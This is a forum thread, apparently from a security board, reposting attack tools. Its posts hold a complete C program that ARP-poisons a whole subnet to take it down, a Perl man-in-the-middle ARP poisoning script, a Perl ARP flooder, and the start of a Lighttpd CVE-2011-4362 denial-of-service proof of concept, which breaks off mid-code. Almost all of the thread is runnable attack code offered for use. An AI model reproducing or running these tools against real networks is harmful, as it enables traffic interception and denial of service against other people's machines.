Nytro

ARP Cache Poisoning /** I do very much enjoy this raw socket network programming. This code could and probably should be optimized in several ways, but I tried. Anyway, this code is for testing and educational purposes only, yadda yadda yadda... The program: Exploits the Address Resolution Protocol (legacy exploit, I know) on the whole subnet. Just read the code if you want to know more. If you can't read it, then learn how it works before thinking about using it. Reasons for compilation/runtime errors: (may be some dumb reasons but you never know...) - misconfiguration with your network (/proc/net/route and your NIC need to be configured) - you aren't root - you aren't even running Linux - missing header files (O_o) - you are an idiot Tested on a private network using Ubuntu Linux on a network with two machines running Windows XP and Slackware Linux **/ /** And the Code: **/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <sys/select.h> #include <features.h> #include <sys/types.h> #include <net/if.h> #include <net/ethernet.h> #include <net/if_arp.h> #include <netinet/in.h> #include <netinet/ether.h> #include <linux/if_packet.h> #include <linux/if_ether.h> #include <linux/ip.h> #include <linux/icmp.h> #include <unistd.h> #include <arpa/inet.h> #include <errno.h> #include <netdb.h> #include <time.h> #include <signal.h> #define BROADCAST "ff:ff:ff:ff:ff:ff" #define EMPTY "00:00:00:00:00:00" #define SPOOF_MAC "00:DE:AD:BE:EF:11" /* 14 byte Ethernet Protocol header definition */ typedef struct EthernetHeader { unsigned char destination[6]; unsigned char source[6]; unsigned short protocol; } EthernetHeader; /* 28 byte ARP header */ typedef struct ArpHeader { unsigned short hardware_type; unsigned short protocol_type; unsigned char hard_addr_len; unsigned char prot_addr_len; unsigned short opcode; unsigned char source_hardware[6]; unsigned int source_ip; unsigned char dest_hardware[6]; unsigned int dest_ip; }__attribute__((__packed__)) ArpHeader; /* a data structure to hold whatever information you want to keep track of about each host */ typedef struct RemoteHost { unsigned char mac[6]; unsigned int ip; } RemoteHost; int childnotdead; /* global variables for SIGNAL access, since you can't really pass any args to a signal handler... */ unsigned char orig_mac[6]; struct ifreq ifr_fix; int sockfd_fix; void createEthHeader(EthernetHeader *ethernet_header, unsigned char *src_mac, unsigned char *dest_mac, int proto) { /* set up 14 byte Ethernet header */ memcpy(ethernet_header->source, src_mac, 6); memcpy(ethernet_header->destination, dest_mac, 6); ethernet_header->protocol = htons(proto); } void createArpHeader(ArpHeader *ArpHeader, unsigned char *src_mac, unsigned char *dst_mac, unsigned int src_ip, unsigned int dst_ip, unsigned int opCode) { /* set up 28 byte ARP header */ ArpHeader->hardware_type = htons(ARPHRD_ETHER); ArpHeader->protocol_type = htons(ETHERTYPE_IP); ArpHeader->hard_addr_len = 6; ArpHeader->prot_addr_len = 4; ArpHeader->opcode = htons(opCode); memcpy(ArpHeader->source_hardware, src_mac, 6); ArpHeader->source_ip = src_ip; memcpy(ArpHeader->dest_hardware, dst_mac, 6); ArpHeader->dest_ip = dst_ip; } /* byte array to null terminated string, any other method of printing the MAC address was annoying */ static char * mactos(unsigned char *addr) { static char buffer[256]; sprintf(buffer,"%02x:%02x:%02x:%02x:%02x:%02x",addr[0],addr[1],addr[2],addr[3],addr[4],addr[5]); return buffer; } /* unsigned int to string, easier way to manage different IP address formats IMHO */ static char * uitos(unsigned int ip) { static char bytes[256]; sprintf(bytes, "%d.%d.%d.%d", (ip >> 24) & 0xFF, (ip >> 16) & 0xFF, (ip >> 8) & 0xFF, (ip >> 0) & 0xFF); return bytes; } /* returns a raw socket file descriptor that listens for packets on the OSI Layer 2 level */ int createRawSockFd(int protocol) { int sockfd; if ((sockfd = socket(PF_PACKET, SOCK_RAW, protocol)) < 0) { perror("socket"); exit(-1); } return sockfd; } /* binds the raw socket FD to the device given as argument one */ int bindSock(char *device_name, int sockfd, int protocol) { struct sockaddr_ll sll; struct ifreq ifr; bzero(&sll,sizeof(sll)); bzero(&ifr,sizeof(ifr)); /* get the interface index */ strncpy((char *)ifr.ifr_name, device_name, IFNAMSIZ); if ((ioctl(sockfd, SIOCGIFINDEX, &ifr))==-1) { printf("Could not get the interface index.\n"); exit(-1); } /* bind raw socket to the interface */ sll.sll_family=AF_PACKET; sll.sll_ifindex=ifr.ifr_ifindex; sll.sll_protocol=htons(protocol); if ((bind(sockfd, (struct sockaddr *)&sll, sizeof(sll)))==-1) { printf("bind failed, couldn't bind raw socket to interface.\n"); exit(1); } return 1; } /* really easy to send packets, just write it out to the socket */ int sendPacket(int sockfd, unsigned char *packet, int packetSize) { int bytes = 0; if ((bytes = write(sockfd, packet, packetSize)) != packetSize) { fprintf(stderr, "could only send %d\\%d bytes of data onto wire\n", bytes, packetSize); return 0; } return 1; } void printPacket(unsigned char *packet, int packet_len) { int i; for (i = 0; i < packet_len; i+=2) { if (!(i % 16)) printf("\n"); printf("%02x%02x ", packet[i], packet[i+1]); } printf("\n\n"); } void strip_newline(char *str) { int i; for (i=0; i<strlen(str); i++) if (str[i] == '\n') str[i] = '\0'; } void handler(int sig) { childnotdead = 0; } /* makes sure that I don't get duplicate addresses, my own, or the gateway */ int validTarget(unsigned int ip, unsigned int localip, unsigned int gatewayip, RemoteHost *hostlist, int curr) { int i; if ((ip == localip) || (ip == gatewayip)) return 0; for (i = 0; i < curr; i++) if (ip == hostlist[i].ip) return 0; return 1; } void banner( void ) { printf("\nARP DoS by suid\n\n"); } void fixMAC(int signum) { printf("Setting MAC address back to %s\n", mactos(orig_mac)); memcpy(&ifr_fix.ifr_hwaddr.sa_data, orig_mac, 6); if (ioctl(sockfd_fix, SIOCSIFHWADDR, &ifr_fix) < 0) { perror("SIOCSIFHWADDR"); exit(-1); } exit(signum); } static char * getAns(char *q) { char *ans = (char *)malloc(sizeof(char)*10); printf("%s", q); fgets(ans, sizeof(ans)-1, stdin); strip_newline(ans); return ans; } void removeHosts(struct RemoteHost *host_list, int numhosts) { char buff[1024], *token; int *hosts = malloc(numhosts), i = 1, j, k = 0; RemoteHost *new_host_list; int newNumHosts; printf("Format: <host0> <host1> <host2> ... <hostn>\n"); fgets(buff, sizeof(buff)-1, stdin); token = strtok(buff, " "); hosts[0] = atoi(token); while ((token = strtok(NULL, " ")) != NULL) { hosts[i] = atoi(token); i++; } newNumHosts = numhosts - i; printf("Now removing...\nHosts: "); for (j = 0; j < i; j++) printf("%s\n", uitos(ntohl(host_list[hosts[j]].ip))); printf("\n"); for (j = 0; j < i; j++) host_list[hosts[j]].ip = 0; new_host_list = (RemoteHost *)malloc(sizeof(RemoteHost)*newNumHosts); for (i = k; i < numhosts; i++) if (host_list[i].ip == 0) continue; else { new_host_list[k] = host_list[i]; k++; } host_list = new_host_list; } int main(int argc, char **argv) { EthernetHeader *arp_ethernet_header, *ethernet_header_reply; ArpHeader *arp_header, *arp_header_reply; unsigned int device_in_addr, gateway_in_addr, netmask, subnet, *remote_hosts, numhosts; int sockfd, i, zeros, numIfs, ArpPacketSize, pid, bytes, hosts_online; unsigned char *ArpPacket, device_mac[6], gateway_mac[6], packet_recv[2048]; char buff[1024], pbuff[1024], *token, *device_name, answer[3]; FILE *pipe; struct ifreq *ifr, *ifr_item; struct ifreq ifr_dat; struct ifconf ifc; struct sockaddr_in sin, *sin2; struct arpreq areq; struct timeval tv; struct in_addr ipaddr; fd_set readfds; RemoteHost *remote_host_info; banner(); /* make sure user has root for raw sockets */ if (getuid() != 0) { fprintf(stderr, "This program requires root priviledges to execute!\n"); exit(-1); } signal(SIGINT, fixMAC); sockfd = createRawSockFd(ETH_P_ALL); sockfd_fix = sockfd; /** GET NIC NAME, NIC IP, NIC MAC, GATEWAY IP, GATEWAY MAC, SUBNET MASK (NUMBER OF HOSTS ON SUBNET) **/ if ((pipe = popen("cat /proc/net/route", "r")) == NULL) { fprintf(stderr, "pipe to cat route failed.\n"); exit(-1); } while (fgets(pbuff, sizeof(pbuff), pipe) != NULL) { token = strtok(pbuff, "\t\n "); device_name = token; while (token != NULL) { token = strtok(NULL, "\t\n "); if (!strcmp(token, "00000000")) { token = strtok(NULL, "\t\n "); gateway_in_addr = strtol(token, NULL, 16); break; } else { break; } token = strtok(NULL, "\t\n "); } } /* bind socket to this default network interface */ bindSock(device_name, sockfd, ETH_P_ALL); /* get list of network address assigned NIC's */ ifc.ifc_len = sizeof(buff); ifc.ifc_buf = buff; if (ioctl(sockfd, SIOCGIFCONF, &ifc) < 0) { perror("SIOCGIFCONF"); exit(-1); } /* find NIC with default route, get NIC IP address */ ifr = ifc.ifc_req; numIfs = ifc.ifc_len / sizeof(struct ifreq); for (i = 0; i < numIfs; i++) { ifr_item = &ifr[i]; if (!strcmp(ifr_item->ifr_name, device_name)) device_in_addr = (((struct sockaddr_in *)&ifr_item->ifr_addr)->sin_addr).s_addr; } /* get NIC/GATEWAY MAC address */ strncpy((char *)ifr_dat.ifr_name, device_name, IFNAMSIZ); if (ioctl(sockfd, SIOCGIFHWADDR, &ifr_dat) < 0) { perror("SIOCGIFHWADDR"); exit(-1); } memcpy(orig_mac, ifr_dat.ifr_hwaddr.sa_data, 6); /* this is SO ugly but meh, it works */ memset(&areq, 0, sizeof(areq)); sin2 = (struct sockaddr_in *)&areq.arp_pa; sin2->sin_family = AF_INET; ipaddr.s_addr = gateway_in_addr; sin2->sin_addr = ipaddr; sin2 = (struct sockaddr_in *)&areq.arp_ha; sin2->sin_family = ARPHRD_ETHER; strncpy(areq.arp_dev, device_name, 15); if (ioctl(sockfd, SIOCGARP, (caddr_t)&areq) == -1) { perror("SIOCGARP: check your ARP table"); exit(-1); } memcpy(gateway_mac, (&areq.arp_ha)->sa_data, 6); memcpy(&ifr_dat.ifr_hwaddr.sa_data,(unsigned char *)ether_aton(SPOOF_MAC),6); if (ioctl(sockfd, SIOCSIFHWADDR, &ifr_dat) < 0) { perror("SIOCSIFHWADDR"); exit(-1); } memcpy(device_mac, ifr_dat.ifr_hwaddr.sa_data, 6); ifr_fix = ifr_dat; /* get subnet mask and network address to calculate number of hosts */ if (ioctl(sockfd, SIOCGIFNETMASK, &ifr_dat) < 0) { perror("SIOCGIFNETMASK"); exit(-1); } memcpy(&sin, &ifr_dat.ifr_addr, sizeof(struct sockaddr)); netmask = sin.sin_addr.s_addr; subnet = (netmask & device_in_addr); for (i=0; i<32; i++) if (ntohl(netmask) & (1<<i)) break; zeros = i; numhosts = (1<<zeros); /* fill host_addrs with possible assigned addresses, skip 0x00?????? 0xFF?????? */ remote_hosts = (unsigned int *)malloc(sizeof(unsigned int)*(numhosts)); for (i = 0; i < numhosts; i++) remote_hosts[i] = (ntohl(subnet) | i); /** END NETWORK INFORMATION QUERIES **/ /** CREATE DEFAULT ARP PACKET **/ /* create memory segment for ARP packet header */ ArpPacketSize = sizeof(EthernetHeader) + sizeof(ArpHeader); ArpPacket = (unsigned char *)malloc(ArpPacketSize); arp_ethernet_header = (EthernetHeader *)ArpPacket; arp_header = (ArpHeader *)(ArpPacket + sizeof(EthernetHeader)); /* fill in ARP Request packet header */ createArpHeader(arp_header, device_mac, (ether_aton(EMPTY))->ether_addr_octet, device_in_addr, 0, ARPOP_REQUEST); /* fill in ARP packet Ethernet header */ createEthHeader(arp_ethernet_header, device_mac, (ether_aton(BROADCAST))->ether_addr_octet, ETHERTYPE_ARP); /** END DEFAULT PACKETS **/ /** CREATE LIST OF HOSTS' IP -> MAC ADDRESSES VIA ARP REQUEST **/ /* use two different processes to handle sending ARP Requests and receiving ARP Replies both for increased speed and reliability */ setbuf(stdout, NULL); printf("\n"); if ((pid = fork()) == 0) { /* send the ARP Requests out to all hosts in remote_hosts */ for (i = 0; i < numhosts; i++) { if (ntohl(remote_hosts[i]) == device_in_addr) continue; arp_header->dest_ip = htonl(remote_hosts[i]); if (!sendPacket(sockfd, ArpPacket, ArpPacketSize)) { perror(" [*] Packet send failed!\n"); exit(-1); } /* some networks create Ethernet collisions with dropped packets as a result so slow it down a small amount */ usleep(100000); } sleep(10); exit(1); } else { /* listen for ARP Replies from the hosts on the network and record the MAC addresses */ remote_host_info = malloc(sizeof(RemoteHost) * numhosts); signal(SIGCHLD, handler); childnotdead = 1; printf("Gathering MAC addresses...\n"); printf("This may take a while so go get a drink or something.\n"); i = 0; while (childnotdead) { /* watch for ARP Replies */ FD_ZERO(&readfds); FD_SET(sockfd, &readfds); tv.tv_sec = 2; memset(packet_recv, 0, sizeof(packet_recv)); if (select(sockfd+1, &readfds, NULL, NULL, &tv) < 0) { perror("select()"); } if (!childnotdead) break; if (FD_ISSET(sockfd, &readfds)) { if ((bytes = read(sockfd, packet_recv, sizeof(packet_recv))) < 0) { perror("read"); } if (bytes > sizeof(EthernetHeader)) { ethernet_header_reply = (EthernetHeader *)packet_recv; if (ntohs(ethernet_header_reply->protocol) == ETHERTYPE_ARP) { arp_header_reply = (ArpHeader *)(packet_recv + sizeof(EthernetHeader)); if (ntohs(arp_header_reply->opcode) == ARPOP_REPLY) { /* make sure source is not myself, the default route, or a duplicate entry */ if (validTarget(arp_header_reply->source_ip, device_in_addr, gateway_in_addr, remote_host_info, i)) { memcpy(remote_host_info[i].mac, arp_header_reply->source_hardware, 6); remote_host_info[i].ip = arp_header_reply->source_ip; i++; } } } } } } hosts_online = i; printf("MAC addresses enumerated, %d machines attached to current subnet.\n", hosts_online); memcpy(answer, getAns("Display list of IP -> MAC? (y/n) "), sizeof(answer)); if (!strcmp(answer, "yes") || !strcmp(answer, "y")) { for (i = 0; i < hosts_online; i++) printf("(%d) %s -> %s\n", i, uitos(ntohl(remote_host_info[i].ip)), mactos(remote_host_info[i].mac)); memset(answer, 0, sizeof(answer)); memcpy(answer, getAns("Would you like to remove any of these hosts from this list? (y/n) "), sizeof(answer)); if (!strcmp(answer, "yes") || !strcmp(answer, "y")) { removeHosts(remote_host_info, hosts_online); } sleep(10); } } /** END MAC ADDRESS **/ printf("\n"); /** SEND SPOOFED ARP REPLY TO EACH HOST ONLINE **/ for ( { //for()ever!! for (i = 0; i < hosts_online; i++) { printf("Poisoning %s...\n", uitos(ntohl(remote_host_info[i].ip))); sleep(1); createArpHeader(arp_header, device_mac, remote_host_info[i].mac, gateway_in_addr, remote_host_info[i].ip, ARPOP_REPLY); createEthHeader(arp_ethernet_header, gateway_mac, remote_host_info[i].mac, ETHERTYPE_ARP); //printPacket(ArpPacket, ArpPacketSize); if (!sendPacket(sockfd, ArpPacket, ArpPacketSize)) { perror(" [*] Packet send failed!\n"); exit(-1); } } printf("Subnet should be down. Repoisoning in 30s ...\n\n"); sleep(30); printf("Repoisoning!\n"); sleep(2); } /** END REPLIES **/ free(ArpPacket); close(sockfd); return 0; } Sursa: r00tsecurity -> Source Code Center :: ARP Cache Poisoning

Monkey || ARP Poisoning tool # monkey.pl # # ARP POISONING FrameWork # Copyright 2011 madstein <madstein@f0r3ns1cs> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. # # use Net::ARP ; use Term::ANSIColor; print q{ -------------------------- MADSTEIN ARP-OPT -------------------------- 1- MITM 2- REPING VICTIM }; print "\n"; print ">Choose OPERANDI:\n"; print color("green"),"\n>>>\n",color("reset"); $menu = <STDIN>; chomp $menu; if($menu == "1") { print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ; $iface = <STDIN>; print color ("red"), "[+]",color ("reset"), "Insert Gateway IP \n" ; $gateway = <STDIN> ; print color ("red"), "[+]",color ("reset"), "Insert Target IP \n" ; $target = <STDIN> ; chomp ($gateway,$target,$iface); #Lets Forward All the Junk shall we system "iptables -P FORWARD ACCEPT"; system "iptables --table nat -A POSTROUTING -o $iface -j MASQUERADE"; #Note some times Net::ARP fails to lookup the Target MAC #If you ever enconter that kind of problem just reload the script #or hardcode the Target MAC $gatemac = Net::ARP::arp_lookup($dev,$gateway); $targetmac = Net::ARP::arp_lookup($dev,$target); $mymac = Net::ARP::get_mac("$iface"); if ($gatemac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Gateway MAC\n"; die } if ($targetmac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Target MAC\n"; die} if ($mymac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Local MAC\n"; die } else { system "clear"; print color ("red"), q{ < wtf > ----- \ \ .:!!!!!:. .!!!!!:. .!!!!!!!!!! ~~~~!!!!!!. .!!!!!!!UWWW$$$ :$$NWX!!: .!!!!XUWW$$$$$$$$$P $$$$$##WX!: .<!!!!UW$$$$" $$$$$$$$# $$$$$ $$$UX :!!UW$$$$$$$$$ 4$$$$$* ^$$$B $$$$\ $$$$$$$$$$$$ d$$R" "*$bd$$$$ '*$$$$$$$$$$$o+#" """" """"""" PURE POISON }, color ("reset"); print color ("green"),"[+]",color ("reset"),"Poison on the Way\n"; print color ("green"),"[+]",color ("reset"),"Monkey in the Middle off $gateway $gatemac |and| $target $targetmac\n"; while (1) { #Gateway operandi this is the, where we Tell the victim we are the gateway Net::ARP::send_packet($iface, $gateway, $target, $mymac, $targetmac, 'reply'); #Target operandi this is the, where we tell the gateway that we are the victim Net::ARP::send_packet($iface, $target, $gateway, $mymac, $gatemac, 'reply'); #ence you see this output you will be poisoning || attack on the way print STDERR color ("green"),".", color ("reset"); sleep (2); } } } if ($menu =="2"){ print color ("green"), "[+]",color ("reset"), "ARP Repinger \n" ; print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ; $iface = <STDIN>; print color ("red"), "[+]",color ("reset"), "Insert Gateway IP \n" ; $gateway = <STDIN> ; print color ("red"), "[+]",color ("reset"), "Insert Target IP \n" ; $target = <STDIN> ; chomp ($gateway,$target,$iface); #Lets Forward All the Junk shall we system "iptables -P FORWARD ACCEPT"; system "iptables --table nat -A POSTROUTING -o $iface -j MASQUERADE"; #Note some times Net::ARP fails to lookup the Target MAC #If you ever enconter that kind of problem just reload the script #or hardcode the Target MAC $gatemac = Net::ARP::arp_lookup($dev,$gateway); $targetmac = Net::ARP::arp_lookup($dev,$target); $mymac = Net::ARP::get_mac("$iface"); if ($gatemac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Gateway MAC\n"; die } if ($targetmac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Target MAC\n"; die} if ($mymac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Local MAC\n"; die } else { system "clear"; print color ("yellow"), q{ < wtf > ----- \ \ .:!!!!!:. .!!!!!:. .!!!!!!!!!! ~~~~!!!!!!. .!!!!!!!UWWW$$$ :$$NWX!!: .!!!!XUWW$$$$$$$$$P $$$$$##WX!: .<!!!!UW$$$$" $$$$$$$$# $$$$$ $$$UX :!!UW$$$$$$$$$ 4$$$$$* ^$$$B $$$$\ $$$$$$$$$$$$ d$$R" "*$bd$$$$ '*$$$$$$$$$$$o+#" """" """"""" PURE POISON }, color ("reset"); print color ("green"),"[+]",color ("reset"),"REPINGER VERSION\n"; for ($count = 7; $count >= 1; $count--) { #Gateway operandi this is, the where we Tell the victim where the gateway is Net::ARP::send_packet($iface, $gateway, $target, $gatemac, $targetmac, 'reply'); #Target operandi this is the, where we tell the gateway where the victim is Net::ARP::send_packet($iface, $target, $gateway, $targetmac, $gatemac, 'reply'); #ence you see this output you will be REPINGING the VIctim attack will stop print STDERR color ("green"),".", color ("reset"); sleep (2); } } print "REPINGED\n"; } Sursa: r00tsecurity -> Source Code Center :: Monkey || ARP Poisoning tool

Network Destroyer ARP TCP Flooder [COLOR=#888] [/COLOR] #!/usr/bin/perl #ubuntu sudo apt-get install libnet-arp-perl #ubuntu sudo apt-get install libnet-rawip-perl #Madstein - arp tester use Net::RawIP; use Term::ANSIColor; use Net::ARP ; inicio: print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ; $iface = <STDIN>; print color ("red"), "[+]",color ("reset"), "Insert IP to Get Mac Addr \n" ; $target = <STDIN> ; chomp ( $target,$iface ) ; $getmac = Net::ARP::arp_lookup($dev,$target); my $count = 0; if ($getmac =~ unknow ) { print "Something went Wrong The Target Retrieved an unknow Mac addr\n"; print "Prees Any Key To Restart Program\n"; $restart = <STDIN>; goto inicio ; } elsif ($getmac =~ "00:00:00:00:00:00" ) { print "00:00:00:00:00:00 retrived error\n"; print "Prees Any Key To Restart Program\n"; $restart = <STDIN>; goto inicio ; } else { print color ("red"), "[+]",color ("reset"), " $target mac is $getmac \n"; print color ("green"), "[+]",color ("reset"), " type.. yes ..to flood || .. no .. to restart Program \n"; $flood = <STDIN>; if ($flood =~ yes ){ while (1) { my $src = join ".", map int rand 255, 1 .. 4; my $spoofedmac = join ":", map int rand 99, 1 .. 6, ; Net::ARP::send_packet($iface, # Device $src, # Source IP $target, # Destination IP $spoofedmac, # Source MAC $getmac, # Destinaton MAC 'reply'); # ARP operation $count++; print "Packeth Sent Tru $iface to $target using $src as ip "; print "with this spoofed mac $spoofedmac amount $count"; } } elsif ($flood =~ "no") { system " clear"; goto inicio;} } [COLOR=#888] [/COLOR] Sursa: r00tsecurity -> Source Code Center :: Network Destroyer ARP TCP Flooder

Lighttpd 1.4.30 / 1.5 Denial Of Service Authored by Adam Zabrocki Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit. /* * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang * * Here the vulnerable code (src/http_auth.c:67) * * --- CUT --- * static const short base64_reverse_table[256] = { * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF * }; * * static unsigned char * base64_decode(buffer *out, const char *in) { * ... * int ch, ...; * size_t i; * ... * * ch = in[i]; * ... * ch = base64_reverse_table[ch]; * ... * } * --- CUT --- * * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices. * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata * section before the base64_reverse_table table cause this situation. * * I have added some extra debug in the lighttpd source code to see if this vulnerability is * executed correctly. Here is output for one of the example: * * --- CUT --- * ptr[0x9a92c48] size[0xc0] used[0x0] * 127(. | 0 | 0) * -128(t | 1 | 0) * -127(e | 2 | 1) * -126(' | 3 | 2) * -125(e | 4 | 3) * -124(u | 5 | 3) * -123(r | 6 | 4) * -122(' | 7 | 5) * -121(s | 8 | 6) * -120(c | 9 | 6) * -119(i | 10 | 7) * -118(n | 11 | 8) * -117(i | 12 | 9) * -116( | 13 | 9) * -115(a | 14 | 10) * -114(t | 15 | 11) * -113(. | 16 | 12) * -112(e | 17 | 12) * -111(u | 18 | 13) * -110(r | 19 | 14) * -109(' | 20 | 15) * -108(f | 21 | 15) * -107(i | 22 | 16) * -106(e | 23 | 17) * -105(: | 24 | 18) * -104(= | 25 | 18) * -103(o | 26 | 19) * -102(t | 27 | 20) * -101(o | 28 | 21) * -100( | 29 | 21) * -99(a | 30 | 22) * -98(g | 31 | 23) * -97(. | 32 | 24) * -96(d | 33 | 24) * -95(g | 34 | 25) * -94(s | 35 | 26) * -93(: | 36 | 27) * -92(u | 37 | 27) * -91(s | 38 | 28) * -90(p | 39 | 29) * -89(o | 40 | 30) * -88(t | 41 | 30) * -87(d | 42 | 31) * -86(b | 43 | 32) * -85(c | 44 | 33) * -84(e | 45 | 33) * -83(d | 46 | 34) * -82(( | 47 | 35) * -81(n | 48 | 36) * -80(y | 49 | 36) * -79(h | 50 | 37) * -78(d | 51 | 38) * -77(g | 52 | 39) * -76(s | 53 | 39) * -75( | 54 | 40) * -74(r | 55 | 41) * -73(p | 56 | 42) * -72(a | 57 | 42) * -71(n | 58 | 43) * -70(. | 59 | 44) * -69(. | 60 | 45) * -68(d | 61 | 45) * -67(g | 62 | 46) * -66(s | 63 | 47) * -65(: | 64 | 48) * -64(( | 65 | 48) * -63(d | 66 | 49) * -62(- | 67 | 50) * -61(e | 68 | 51) * -60(s | 69 | 51) * -59( | 70 | 52) * -58(i | 71 | 53) * -57(s | 72 | 54) * -56(n | 73 | 54) * -55( | 74 | 55) * -54(i | 75 | 56) * -53(l | 76 | 57) * -52(. | 77 | 57) * -51(. | 78 | 58) * -50(k | 79 | 59) * -49(0 | 80 | 60) * -48(% | 81 | 60) * -47(] | 82 | 61) * -46(p | 83 | 62) * -45(r | 84 | 63) * -44(0 | 85 | 63) * -43(% | 86 | 64) * -42(] | 87 | 65) * -41(s | 88 | 66) * -40(z | 89 | 66) * -39([ | 90 | 67) * -38(x | 91 | 68) * -37(x | 92 | 69) * -36( | 93 | 69) * -35(s | 94 | 70) * -34(d | 95 | 71) * -33(0 | 96 | 72) * -32(% | 97 | 72) * -31(] | 98 | 73) * -30(. | 99 | 74) * -29(. | 100 | 75) * -28(d | 101 | 75) * -27(c | 102 | 76) * -26(d | 103 | 77) * -25(i | 104 | 78) * -24(g | 105 | 78) * -23(b | 106 | 79) * -22(s | 107 | 80) * -21(6 | 108 | 81) * -20(- | 109 | 81) * -19(t | 110 | 82) * -18(i | 111 | 83) * -17(g | 112 | 84) * -16(f | 113 | 84) * -15(i | 114 | 85) * -14(e | 115 | 86) * -13(. | 116 | 87) * -12(. | 117 | 87) * -11(. | 118 | 88) * -10(. | 119 | 89) * -9(. | 120 | 90) * -8(. | 121 | 90) * -7(. | 122 | 91) * -6(. | 123 | 92) * -5(. | 124 | 93) * -4(. | 125 | 93) * -3(. | 126 | 94) * -2(. | 127 | 95) * -1(. | 128 | 96) * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0] * ptr[0x9a92c48] size[0xc0] used[0x60] * string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.] * --- CUT --- * * First column is the offset so vulnerability is executed like it should be * (negative offsets). Second column is byte which is read out-of-bound. * * * Maybe you can find vulnerable binary? * * * Best regards, * Adam 'pi3' Zabrocki * * * -- * http://pi3.com.pl * http://site.pi3.com.pl/exp/p_cve-2011-4362.c * http://blog.pi3.com.pl/?p=277 * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <getopt.h> #define PORT 80 #define SA struct sockaddr char header[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic "; char header_port[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s:%d\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic "; int main(int argc, char *argv[]) { int i=PORT,opt=0,sockfd; char *remote_dir = NULL; char *r_hostname = NULL; struct sockaddr_in servaddr; struct hostent *h = NULL; char *buf; unsigned int len = 0x0; if (!argv[1]) usage(argv[0]); printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n"); printf("\n\t\t[+] Preparing arguments... "); while((opt = 